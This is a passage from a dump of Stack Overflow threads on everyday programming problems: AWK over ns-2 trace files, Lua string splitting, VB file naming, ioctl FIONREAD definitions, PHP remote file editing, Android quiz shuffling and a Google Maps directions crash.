--- 12 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [12] 0 0\nr 5.096000000 _59_ RTR --- 12 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [12] 0 0\ns 5.104000000 _59_ AGT --- 13 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [13] 0 0\nr 5.104000000 _59_ RTR --- 13 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [13] 0 0\ns 5.112000000 _59_ AGT --- 14 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [14] 0 0\nr 5.112000000 _59_ RTR --- 14 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [14] 0 0\ns 5.120000000 _59_ AGT --- 15 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [15] 0 0\nr 5.120000000 _59_ RTR --- 15 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [15] 0 0\ns 5.128000000 _59_ AGT --- 16 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [16] 0 0\nr 5.128000000 _59_ RTR --- 16 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [16] 0 0\ns 5.136000000 _59_ AGT --- 17 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [17] 0 0\nr 5.136000000 _59_ RTR --- 17 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 
5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [17] 0 0\ns 5.144000000 _59_ AGT --- 18 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [18] 0 0\nr 5.144000000 _59_ RTR --- 18 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [18] 0 0\ns 5.152000000 _59_ AGT --- 19 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [19] 0 0\nr 5.152000000 _59_ RTR --- 19 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [19] 0 0\ns 5.160000000 _59_ AGT --- 20 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [20] 0 0\nr 5.160000000 _59_ RTR --- 20 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [20] 0 0\ns 5.168000000 _59_ AGT --- 21 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [21] 0 0\nr 5.168000000 _59_ RTR --- 21 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [21] 0 0\ns 5.176000000 _59_ AGT --- 22 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [22] 0 0\nr 5.176000000 _59_ RTR --- 22 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [22] 0 0\n<\/code>\n's' and 'r' in column 1 denote 'send' and 'receive' respectively. Column 2 shows time. I want to run the following branch instruction on all lines and thereby calculate the delivery rate which is the percent ratio of <code>nRecvd\/nSent*100<\/code>, but between in 10-second intervals. Next, I want to append time and delivery rate (in pair) for every interval to FILE so I can later use these pairs for plotting. However, the following AWK code does not give me any output. Where am I wrong? \n<code>BEGIN{\n nSent=0;\n nRecvd=0;\n nDropped=0;\n FILE=\"delivery.txt\"\n}\n\n{\nif ($1 == \"s\" && $4 == \"AGT\") nSent++;\nelse if ($1 ==\"r\" && $4 == \"AGT\") nRecvd++;\nelse if ($1 ==\"D\") nDropped++;\nif ($1 == \"r\" && $4 ==\"AGT\" && ($2 % 10) ==0) { \n print $2 \" \" nSent\/nReceived*100 \"\\n\" >>FILE;\n nSent=0;\n nRecvd=0;\n}\n\n}\n\nEND {\n\n}\n<\/code>\nUpdate: \nAnother part of the trace file is as follows: \n<code>r 10.103806919 _0_ AGT --- 120 cbr 1020 [13a 0 21 800] ------- [33:0 0:0 30 0] [7] 1 0\ns 10.104000000 _33_ AGT --- 126 cbr 1000 [0 0 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] ------- [33:0 0:0 32 0] [13] 0 0\nr 10.104000000 _33_ RTR --- 126 cbr 1000 [0 0 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] ------- [33:0 0:0 32 0] [13] 0 0\ns 10.104000000 _33_ RTR --- 126 cbr 1020 [0 0 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] ------- [33:0 0:0 30 0] [13] 0 0\nr 10.104096612 _33_ MAC --- 0 ACK 38 [0 21 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] \nr 10.104114453 _14_ MAC --- 0 AODV 48 [0 ffffffff f 800] [energy 1989.895886 ei 10.069 es 0.000 et 0.003 er 0.032] ------- [33:255 -1:255 \n<\/code>\nAnswer: I guess this is because of your modulo. Indeed, in awk <code>1.00001 % 2 = 1.00001<\/code>. So if you never have a rounded time (i.e. X.0), your last if will never be true. 
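The claim about fractional remainders is easy to verify with ordinary floating-point arithmetic; a quick check in Python, using timestamps taken from the traces above:
<code>print(5.072 % 10)              # 5.072 -> ($2 % 10) == 0 never fires for these rows
print(int(5.072) % 10)         # 5
print(int(10.103806919) % 10)  # 0 -> truncating first makes multiples of 10 detectable
</code>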
Try using <code>int()<\/code>:\n<code>if ($1 == \"r\" && $4 ==\"AGT\" && (int($2) % 10) == 0)\n<\/code>\nAnswer: You are using <code>nReceived<\/code> in the printing rule which is never set\/modified. So most likely that causes an error.\nAnd on \"<code>r<\/code>\" lines in your example input <code>$4<\/code> is always \"<code>RTR<\/code>\" which results in a division by zero...\nAnd next time please tell us, what is not working? No output? Error message?\nComment: Division by zero is explained in my answer above: you are trying to use `nReceived` as divisor but it's not existing at the time.\nComment: I was getting no output. After applying @Shitsu's advice for casting to int now I receive a division by zero notice. Also, note that the actual trace file was too big too include here, so I just gave it partially.\nComment: You are right. I mistakenly typed `nReceived` instead of `nRecvd`.\n","meta":{"source":"stackoverflow","title":"AWK modulo does not work correctly with trace file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get a certain value from a concatenated table\n\nQuestion: Trying to allow a concatenated table to be referenced as such: \n<code>local group = table.concat(arguments, \",\", 1)\n<\/code>\nwhere arguments = {\"1,1,1\"}\nCurrently, doing <code>group[2]<\/code> gives me the comma. How do I avoid that while still allowing for two-digit numbers?\n(snippet of what I'm trying to use it for)\n<code>for i = 1, #group do\ntarget:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\nComment: `table.concat` turns a table into a string. If `arguments` is a table of one string `table.concat` isn't going to do anything particularly meaningful for you.\nAnswer: Maybe you want something like\n<code>local i = 1\nfor v in string.gmatch(s, \"(%w+),*\") do\n group[i] = v\n i = i + 1\nend\n<\/code>\nRevised version in response to comment, avoiding the table altogether:\n<code>local i = 1\nfor v in string.gmatch(s, \"(%w+),*\") do\n target:SetGroup(i, tonumber(v))\n i = i + 1\nend\n<\/code>\nComment: I wanted the target:SetGroup feature to run as many times as there are numbers (if it's \"1,1,1\", run 3 times, each time the first \"i\" in setgroup is changing from 1 to 2 to 3). It would also use the numbers from the supplied table. How would I implement this?\nComment: The code I provided creates the table from the string. The code in your question should work fine with the `group` table it builds. Or you could avoid tables altogether with the revised version.\nAnswer: split function (you have to add it to code)\n<code>split = function(str, delim)\n if not delim then\n delim = \" \"\n end\n -- Eliminate bad cases...\n if string.find(str, delim) == nil then\n return { str }\n end\n local result = {}\n local pat = \"(.-)\" .. delim .. \"()\"\n local nb = 0\n local lastPos\n for part, pos in string.gfind(str, pat) do\n nb = nb + 1\n result[nb] = part\n lastPos = pos\n end\n -- Handle the last field\n result[nb + 1] = string.sub(str, lastPos)\n return result\nend\n<\/code>\nso\n<code>local arguments = {\"1,1,1\"};\nlocal group = split(arguments[1], \",\");\n\nfor i = 1, #group do\n target:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\n\nalso note that\n<code>local arguments = {\"1,1,1\"};\nlocal group = split(arguments[1], \",\");\nlocal group_count = #group;\n\nfor i = 1, group_count do\n target:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\nis faster code ;)\nComment: The second version isn't faster code. 
It could even be slightly slower because it has an extra assignment to a local variable (and there is more code to parse\/compile) ...\n","meta":{"source":"stackoverflow","title":"Get a certain value from a concatenated table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using a textbox value for a file name\n\nQuestion: How do you use a textbox value for VB to save some text to? This is what I have so far:\n<code>Private Sub Button1_Click(sender As Object, e As EventArgs) Handles butUpdate.Click\n Dim ECOLID As String\n ECOLID = txtID.Text\n Dim file As System.IO.StreamWriter\n file = My.Computer.FileSystem.OpenTextFileWriter(\"?\", True)\n file.WriteLine(\"ECOL Number:\")\n file.WriteLine(txtID.Text)\n file.Close()\nEnd Sub\n<\/code>\nThe txtID text will determine the title however how can I get it to save it as \"C:\/Order\/'txtID'.txt\" for example?\nAnswer: A textbox has a property called Name and this is (usually) the same as the variable name that represent the TextBox in your code.\nSo, if you want to create a file with the same name of your textbox you could write\n<code> file = My.Computer.FileSystem.OpenTextFileWriter(txtID.Name & \".txt\", True)\n<\/code>\nHowever there is a big improvement to make to your code\n<code>Private Sub Button1_Click(sender As Object, e As EventArgs) Handles butUpdate.Click\n Dim ECOLID As String\n ECOLID = txtID.Text\n Dim fileName = txtID.Name & \".txt\"\n Using file = My.Computer.FileSystem.OpenTextFileWriter(fileName, True)\n file.WriteLine(\"ECOL Number:\")\n file.WriteLine(txtID.Text)\n End Using\nEnd Sub\n<\/code>\nIn this version the opening of the StreamWriter object is enclosed in a Using Statement. This is fundamental to correctly release the resources to the operating system when you have done to work with your file because the End Using ensures that your file is closed and disposed correctly also in case of exceptions\n","meta":{"source":"stackoverflow","title":"Using a textbox value for a file name","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where can I find the definition for a system call parameter?\n\nQuestion: In the ioctl man page it defines:\n<code>int ioctl(int d,int request,...); \n<\/code>\nFor example:\n<code>ioctl(fd,FIONREAD,&nread); \n<\/code>\nWhere can I find this FIONREAD information in Linux? Where is this information defined? How many types are there like this?\nComment: `man ioctl` -> `#include ` -> \/usr\/include\/bits\/ioctls.h -> \/usr\/include\/asm\/ioctls.h -> asm-generic\/ioctls.h -> #define FIONREAD 0x541B\nAnswer: In general, the man page of the system call (<code>man 2 ioctl<\/code> \u2014\u00a0section 2 is for system calls) is the right place.\n<code>ioctl<\/code> is a special case because the point of this system call is to allow applications to send commands to devices that don't fit in the general mold. So often the documentation of the parameters is not in the documentation of <code>ioctl<\/code>, but in the documentation of device drivers. Man pages for devices are in section 4 (or section 7 on some Unix variants).\nOn Linux, the <code>ioctl(2)<\/code> man page references <code>ioctl_list(2)<\/code> which contains a summary of common ioctl types. There is more documentation about some ioctls in device man pages such as <code>tty_ioctl(4)<\/code> (terminals \u2014\u00a0that's what <code>FIONREAD<\/code> is used for) and <code>sd(4)<\/code> (disks with a SCSI-like interface). More ioctl are documented in the kernel documentation, for example for CD drives. 
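As an aside on the FIONREAD example from the question, once the headers define the constant it is usually re-exported by language runtimes as well. A small Python sketch that issues the same ioctl; it assumes it is run with stdin attached to a terminal:
<code>import fcntl
import struct
import sys
import termios

# termios.FIONREAD mirrors the kernel header value (0x541B via asm-generic on
# Linux); the ioctl fills an int with the number of bytes waiting on the fd.
buf = struct.pack("i", 0)
buf = fcntl.ioctl(sys.stdin.fileno(), termios.FIONREAD, buf)
nread = struct.unpack("i", buf)[0]
print("bytes waiting on stdin:", nread)
</code>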
For many drivers, Linux lacks documentation and you need to refer to the kernel source code or the headers (search under <code>\/usr\/include<\/code> and hope that you'll find comments).\nAnswer: As a rule of thumb, any time you have an identifier in all caps, at least in the c language, it is usually defined in a header file somewhere. It could be a type, an enum, or it could be an explicitly defined symbol. Most of the time, looking in the header file is only useful to see what other possible options you have to choose from. Using find and grep will usually locate the file (linux example):\n<code>cd \/usr\/include; find . -type f -name \\*.h -print0 | xargs -0 grep <name>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Where can I find the definition for a system call parameter?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Read and write to remote file PHP\n\nQuestion: I am trying to read and write a remote a file to the user's browser through CodeIgniter(FTP Class). That is, I want user to read the file edit the content and save it back.\nOne way will be \n- download the file to my server\n- read the file and echo to the user(Browser)\n- Save the content of the file to local copy(My server)\n- upload the file back to the server\nBut I don't want to download the file to my server I just want to read and write to remote file\nAnswer: You can write it to the temporary file and after displaying just delete it using unlink() function in the same script. Just call it straight after echoing the content. The file will be present on your server for a really short period of time. FTP is used to upload files, but not for editing them remotely. Any FTP client supporting file edit is actually saving it to the temp folder on your computer and after the edit uploads it back to the server.\n","meta":{"source":"stackoverflow","title":"Read and write to remote file PHP","dup_signals":{}},"subset":"stackexchange"} +{"text":"Randomize array of questions while reading from text file android\n\nQuestion: This is a android quiz app code snippet which load the question from text file.\nI want to shuffle the question and answer after every next click so how can i implement random function ?\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/src\/ssk\/quizfun\/QuizFunActivity.java\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/res\/raw\/questions.txt \n<code> private void loadQuestions() throws Exception {\n try {\n InputStream questions = this.getBaseContext().getResources()\n .openRawResource(R.raw.questions);\n bReader = new BufferedReader(new InputStreamReader(questions));\n StringBuilder quesString = new StringBuilder();\n String aJsonLine = null;\n while ((aJsonLine = bReader.readLine()) != null) {\n quesString.append(aJsonLine);\n }\n Log.d(this.getClass().toString(), quesString.toString());\n JSONObject quesObj = new JSONObject(quesString.toString());\n quesList = quesObj.getJSONArray(\"Questions\");\n Log.d(this.getClass().getName(),\n \"Num Questions \" + quesList.length());\n } catch (Exception e){\n\n } finally {\n try {\n bReader.close();\n } catch (Exception e) {\n Log.e(\"\", e.getMessage().toString(), e.getCause());\n }\n\n }\n\n }\n\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/src\/ssk\/quizfun\/QuizFunActivity.java\n<\/code>\nComment: oviosuly you can shuffle with Collections.shuffle\nComment: can you give me some example\nComment: `Collections.shuffle` on a `JSONArray`? 
Is that even possible?\nComment: You could have a look at [Aleadam's solution](http:\/\/stackoverflow.com\/questions\/5531130\/an-efficient-way-to-shuffle-a-json-array-in-java).\nAnswer: I will refrain from posting much code because I think you should attempt it on your own. It is seriously not that tough. I will give you an approach though.\nYou have <code>quesList = quesObj.getJSONArray(\"Questions\");<\/code>. So <code>quesList<\/code> is the list of questions that is a <code>JSONArray<\/code>. You want to shuffle this. Just do this:\n\nGet the length of the <code>quesList<\/code> array. Let's call it <code>len<\/code>.\nCreate a simple arrayList called <code>quesOrder<\/code> containing integers <code>0 to len<\/code>.\n<code>List<Integer> quesOrder = new ArrayList<>();\nfor (int i = 0; i <= len; i++)\n{\n quesOrder.add(i);\n}\n<\/code>\n\nOnce you have the <code>quesOrder<\/code> array. Just do <code>Collections.shuffle(quesOrder);<\/code>. Now when you get questions from your <code>quesList<\/code> array, just get the index from <code>quesOrder<\/code> list. And you will have a randomized selection. Put it together in a function for convenience.\n","meta":{"source":"stackoverflow","title":"Randomize array of questions while reading from text file android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Driving distance and travel time duration between two locations in Google Map Android API V2\n\nQuestion: I am trying to implement this example in android studio:\ndriving distance and travel time duration between two locations\nI am facing errors during runtime as follows:\n<code>E\/GMPM: getGoogleAppId failed with status: 10\nE\/GMPM: Uploading is not possible. App measurement disabled\nD\/AndroidRuntime: Shutting down VM\nE\/AndroidRuntime: FATAL EXCEPTION: main\nProcess: com.start.yogeshp.location, PID: 7332\njava.lang.RuntimeException: Unable to start activity ComponentInfo{com.start.yogeshp.location\/com.start.yogeshp.location.MainActivity}: android.view.InflateException: Binary XML file line #19: Error inflating class fragment\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2298)\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\nat android.os.Handler.dispatchMessage(Handler.java:102)\nat android.os.Looper.loop(Looper.java:135)\nat android.app.ActivityThread.main(ActivityThread.java:5221)\nat java.lang.reflect.Method.invoke(Native Method)\nat java.lang.reflect.Method.invoke(Method.java:372)\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\nCaused by: android.view.InflateException: Binary XML file line #19: Error inflating class fragment\nat android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:763)\nat android.view.LayoutInflater.rInflate(LayoutInflater.java:806)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:504)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:414)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:365)\nat com.android.internal.policy.impl.PhoneWindow.setContentView(PhoneWindow.java:377)\nat android.app.Activity.setContentView(Activity.java:2144)\nat com.start.yogeshp.location.MainActivity.onCreate(MainActivity.java:40)\nat android.app.Activity.performCreate(Activity.java:5937)\nat 
android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1105)\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2251)\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\u00a0\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\u00a0\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\u00a0\nat android.os.Handler.dispatchMessage(Handler.java:102)\u00a0\nat android.os.Looper.loop(Looper.java:135)\u00a0\nat android.app.ActivityThread.main(ActivityThread.java:5221)\u00a0\nat java.lang.reflect.Method.invoke(Native Method)\u00a0\nat java.lang.reflect.Method.invoke(Method.java:372)\u00a0\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\u00a0\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\u00a0\nCaused by: java.lang.NullPointerException\nat java.lang.VMClassLoader.findLoadedClass(Native Method)\nat java.lang.ClassLoader.findLoadedClass(ClassLoader.java:362)\nat java.lang.ClassLoader.loadClass(ClassLoader.java:499)\nat java.lang.ClassLoader.loadClass(ClassLoader.java:469)\nat android.support.v4.app.Fragment.isSupportFragmentClass(Fragment.java:457)\nat android.support.v4.app.FragmentManagerImpl.onCreateView(FragmentManager.java:2248)\nat android.support.v4.app.FragmentController.onCreateView(FragmentController.java:111)\nat android.support.v4.app.FragmentActivity.dispatchFragmentsOnCreateView(FragmentActivity.java:314)\nat android.support.v4.app.BaseFragmentActivityHoneycomb.onCreateView(BaseFragmentActivityHoneycomb.java:31)\nat android.support.v4.app.FragmentActivity.onCreateView(FragmentActivity.java:79)\nat android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:733)\nat android.view.LayoutInflater.rInflate(LayoutInflater.java:806)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:504)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:414)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:365)\u00a0\nat com.android.internal.policy.impl.PhoneWindow.setContentView(PhoneWindow.java:377)\u00a0\nat android.app.Activity.setContentView(Activity.java:2144)\u00a0\nat com.start.yogeshp.location.MainActivity.onCreate(MainActivity.java:40)\u00a0\nat android.app.Activity.performCreate(Activity.java:5937)\u00a0\nat android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1105)\u00a0\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2251)\u00a0\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\u00a0\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\u00a0\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\u00a0\nat android.os.Handler.dispatchMessage(Handler.java:102)\u00a0\nat android.os.Looper.loop(Looper.java:135)\u00a0\nat android.app.ActivityThread.main(ActivityThread.java:5221)\u00a0\nat java.lang.reflect.Method.invoke(Native Method)\u00a0\nat java.lang.reflect.Method.invoke(Method.java:372)\u00a0\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\u00a0\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\u00a0\n<\/code>\nThese are my files:\nMainActivity.java\n<code> public class MainActivity extends FragmentActivity {\n\nGoogleMap map;\nArrayList<LatLng> markerPoints;\nTextView tvDistanceDuration;\n@Override\nprotected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n\n 
tvDistanceDuration = (TextView) findViewById(R.id.tv_distance_time);\n\n \/\/ Initializing\n markerPoints = new ArrayList<LatLng>();\n\n \/\/ Getting reference to SupportMapFragment of the activity_main\n SupportMapFragment fm = (SupportMapFragment)getSupportFragmentManager().findFragmentById(R.id.map);\n\n \/\/ Getting Map for the SupportMapFragment\n map = fm.getMap();\n\n \/\/ Enable MyLocation Button in the Map\n map.setMyLocationEnabled(true);\n\n \/\/ Setting onclick event listener for the map\n map.setOnMapClickListener(new OnMapClickListener() {\n\n @Override\n public void onMapClick(LatLng point) {\n\n \/\/ Already two locations\n if(markerPoints.size()>1){\n markerPoints.clear();\n map.clear();\n }\n\n \/\/ Adding new item to the ArrayList\n markerPoints.add(point);\n\n \/\/ Creating MarkerOptions\n MarkerOptions options = new MarkerOptions();\n\n \/\/ Setting the position of the marker\n options.position(point);\n\n \/**\n * For the start location, the color of marker is GREEN and\n * for the end location, the color of marker is RED.\n *\/\n if(markerPoints.size()==1){\n options.icon(BitmapDescriptorFactory.defaultMarker(BitmapDescriptorFactory.HUE_GREEN));\n }else if(markerPoints.size()==2){\n options.icon(BitmapDescriptorFactory.defaultMarker(BitmapDescriptorFactory.HUE_RED));\n }\n\n \/\/ Add new marker to the Google Map Android API V2\n map.addMarker(options);\n\n \/\/ Checks, whether start and end locations are captured\n if(markerPoints.size() >= 2){\n LatLng origin = markerPoints.get(0);\n LatLng dest = markerPoints.get(1);\n\n \/\/ Getting URL to the Google Directions API\n String url = getDirectionsUrl(origin, dest);\n\n DownloadTask downloadTask = new DownloadTask();\n\n \/\/ Start downloading json data from Google Directions API\n downloadTask.execute(url);\n }\n }\n });\n}\n\nprivate String getDirectionsUrl(LatLng origin,LatLng dest){\n\n \/\/ Origin of route\n String str_origin = \"origin=\"+origin.latitude+\",\"+origin.longitude;\n\n \/\/ Destination of route\n String str_dest = \"destination=\"+dest.latitude+\",\"+dest.longitude;\n\n \/\/ Sensor enabled\n String sensor = \"sensor=false\";\n\n \/\/ Building the parameters to the web service\n String parameters = str_origin+\"&\"+str_dest+\"&\"+sensor;\n\n \/\/ Output format\n String output = \"json\";\n\n \/\/ Building the url to the web service\n String url = \"https:\/\/maps.googleapis.com\/maps\/api\/directions\/\"+output+\"?\"+parameters;\n\n return url;\n}\n\n\/** A method to download json data from url *\/\nprivate String downloadUrl(String strUrl) throws IOException{\n String data = \"\";\n InputStream iStream = null;\n HttpURLConnection urlConnection = null;\n try{\n URL url = new URL(strUrl);\n\n \/\/ Creating an http connection to communicate with url\n urlConnection = (HttpURLConnection) url.openConnection();\n\n \/\/ Connecting to url\n urlConnection.connect();\n\n \/\/ Reading data from url\n iStream = urlConnection.getInputStream();\n\n BufferedReader br = new BufferedReader(new InputStreamReader(iStream));\n\n StringBuffer sb = new StringBuffer();\n\n String line = \"\";\n while( ( line = br.readLine()) != null){\n sb.append(line);\n }\n\n data = sb.toString();\n\n br.close();\n\n }catch(Exception e){\n Log.d(\"Exception while downloading url\", e.toString());\n }finally{\n iStream.close();\n urlConnection.disconnect();\n }\n return data;\n}\n\n\/\/ Fetches data from url passed\nprivate class DownloadTask extends AsyncTask<String, Void, String>{\n\n \/\/ Downloading data in non-ui thread\n 
@Override\n protected String doInBackground(String... url) {\n\n \/\/ For storing data from web service\n String data = \"\";\n\n try{\n \/\/ Fetching the data from web service\n data = downloadUrl(url[0]);\n }catch(Exception e){\n Log.d(\"Background Task\",e.toString());\n }\n return data;\n }\n\n \/\/ Executes in UI thread, after the execution of\n \/\/ doInBackground()\n @Override\n protected void onPostExecute(String result) {\n super.onPostExecute(result);\n\n ParserTask parserTask = new ParserTask();\n\n \/\/ Invokes the thread for parsing the JSON data\n parserTask.execute(result);\n }\n}\n\n\/** A class to parse the Google Places in JSON format *\/\nprivate class ParserTask extends AsyncTask<String, Integer, List<List<HashMap<String,String>>> >{\n\n \/\/ Parsing the data in non-ui thread\n @Override\n protected List<List<HashMap<String, String>>> doInBackground(String... jsonData) {\n\n JSONObject jObject;\n List<List<HashMap<String, String>>> routes = null;\n\n try{\n jObject = new JSONObject(jsonData[0]);\n DirectionsJSONParser parser = new DirectionsJSONParser();\n\n \/\/ Starts parsing data\n routes = parser.parse(jObject);\n }catch(Exception e){\n e.printStackTrace();\n }\n return routes;\n }\n\n \/\/ Executes in UI thread, after the parsing process\n @Override\n protected void onPostExecute(List<List<HashMap<String, String>>> result) {\n ArrayList<LatLng> points = null;\n PolylineOptions lineOptions = null;\n MarkerOptions markerOptions = new MarkerOptions();\n String distance = \"\";\n String duration = \"\";\n\n if(result.size()<1){\n Toast.makeText(getBaseContext(), \"No Points\", Toast.LENGTH_SHORT).show();\n return;\n }\n\n \/\/ Traversing through all the routes\n for(int i=0;i<result.size();i++){\n points = new ArrayList<LatLng>();\n lineOptions = new PolylineOptions();\n\n \/\/ Fetching i-th route\n List<HashMap<String, String>> path = result.get(i);\n\n \/\/ Fetching all the points in i-th route\n for(int j=0;j<path.size();j++){\n HashMap<String,String> point = path.get(j);\n\n if(j==0){ \/\/ Get distance from the list\n distance = (String)point.get(\"distance\");\n continue;\n }else if(j==1){ \/\/ Get duration from the list\n duration = (String)point.get(\"duration\");\n continue;\n }\n\n double lat = Double.parseDouble(point.get(\"lat\"));\n double lng = Double.parseDouble(point.get(\"lng\"));\n LatLng position = new LatLng(lat, lng);\n\n points.add(position);\n }\n\n \/\/ Adding all the points in the route to LineOptions\n lineOptions.addAll(points);\n lineOptions.width(2);\n lineOptions.color(Color.RED);\n }\n\n tvDistanceDuration.setText(\"Distance:\"+distance + \", Duration:\"+duration);\n\n \/\/ Drawing polyline in the Google Map for the i-th route\n map.addPolyline(lineOptions);\n }\n} }\n<\/code>\nDirectionsJSONParser.java:\n<code> public class DirectionsJSONParser {\n\n\/** Receives a JSONObject and returns a list of lists containing latitude and longitude *\/\npublic List<List<HashMap<String,String>>> parse(JSONObject jObject){\n\n List<List<HashMap<String, String>>> routes = new ArrayList<List<HashMap<String,String>>>() ;\n JSONArray jRoutes = null;\n JSONArray jLegs = null;\n JSONArray jSteps = null;\n JSONObject jDistance = null;\n JSONObject jDuration = null;\n\n try {\n\n jRoutes = jObject.getJSONArray(\"routes\");\n\n \/** Traversing all routes *\/\n for(int i=0;i<jRoutes.length();i++){\n jLegs = ( (JSONObject)jRoutes.get(i)).getJSONArray(\"legs\");\n\n List<HashMap<String, String>> path = new ArrayList<HashMap<String, String>>();\n\n \/** Traversing 
all legs *\/\n for(int j=0;j<jLegs.length();j++){\n\n \/** Getting distance from the json data *\/\n jDistance = ((JSONObject) jLegs.get(j)).getJSONObject(\"distance\");\n HashMap<String, String> hmDistance = new HashMap<String, String>();\n hmDistance.put(\"distance\", jDistance.getString(\"text\"));\n\n \/** Getting duration from the json data *\/\n jDuration = ((JSONObject) jLegs.get(j)).getJSONObject(\"duration\");\n HashMap<String, String> hmDuration = new HashMap<String, String>();\n hmDuration.put(\"duration\", jDuration.getString(\"text\"));\n\n \/** Adding distance object to the path *\/\n path.add(hmDistance);\n\n \/** Adding duration object to the path *\/\n path.add(hmDuration);\n\n jSteps = ( (JSONObject)jLegs.get(j)).getJSONArray(\"steps\");\n\n \/** Traversing all steps *\/\n for(int k=0;k<jSteps.length();k++){\n String polyline = \"\";\n polyline = (String)((JSONObject)((JSONObject)jSteps.get(k)).get(\"polyline\")).get(\"points\");\n List<LatLng> list = decodePoly(polyline);\n\n \/** Traversing all points *\/\n for(int l=0;l<list.size();l++){\n HashMap<String, String> hm = new HashMap<String, String>();\n hm.put(\"lat\", Double.toString(((LatLng)list.get(l)).latitude) );\n hm.put(\"lng\", Double.toString(((LatLng)list.get(l)).longitude) );\n path.add(hm);\n }\n }\n }\n routes.add(path);\n }\n } catch (JSONException e) {\n e.printStackTrace();\n }catch (Exception e){\n }\n return routes;\n}\n\n\/**\n * Method to decode polyline 